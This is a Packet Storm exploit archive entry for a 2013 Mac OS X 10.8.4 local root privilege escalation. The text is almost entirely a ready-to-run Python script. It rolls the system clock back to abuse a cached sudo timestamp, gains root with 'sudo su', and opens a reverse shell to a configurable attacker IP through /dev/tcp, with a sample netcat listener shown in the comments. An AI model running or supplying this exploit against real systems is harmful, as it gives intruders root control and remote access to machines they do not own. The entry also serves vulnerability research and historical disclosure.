Mac OS X 10.8.4 Local Privilege Escalation

2013-08-30T00:00:00
ID PACKETSTORM:123032
Type packetstorm
Reporter David Kennedy
Modified 2013-08-30T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
  
# Original MSF Module:  
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudo_password_bypass.rb  
  
###################################################################################################  
# Exploit Title: OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell  
# Date: 08-27-2013  
# Exploit Author: David Kennedy @ TrustedSec  
# Website: https://www.trustedsec.com  
# Twitter: @Dave_ReL1K  
# Tested On: OSX 10.8.4  
#  
# Reference: http://www.exploit-db.com/exploits/27944/  
#  
# Example below:  
# trustedsec:Desktop Dave$ python osx_esc.py  
# [*] Exploit has been performed. You should have a shell on ipaddr: 127.0.0.1 and port 4444  
#  
# attacker_box:~ Dave$ nc -l 4444  
# bash: no job control in this shell  
# bash-3.2#  
###################################################################################################  
import subprocess  
  
# IPADDR for REVERSE SHELL - change this to your attacker IP address  
ipaddr = "192.168.1.1"  
  
# PORT for REVERSE SHELL - change this to your attacker port address  
port = "4444"  
  
# drop into a root shell - replace 192.168.1.1 with the reverse listener  
proc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)  
proc.stdin.write("systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port))  
print """  
###############################################################  
#  
# OSX < 10.8.4 Local Root Priv Escalation Root Reverse Shell  
#  
# Written by: David Kennedy @ TrustedSec  
# Website: https://www.trustedsec.com  
# Twitter: @Dave_ReL1K  
#  
# Reference: http://www.exploit-db.com/exploits/27944/  
###############################################################  
"""  
print "[*] Exploit has been performed. You should have a shell on ipaddr: %s and port %s" % (ipaddr,port)  
  
`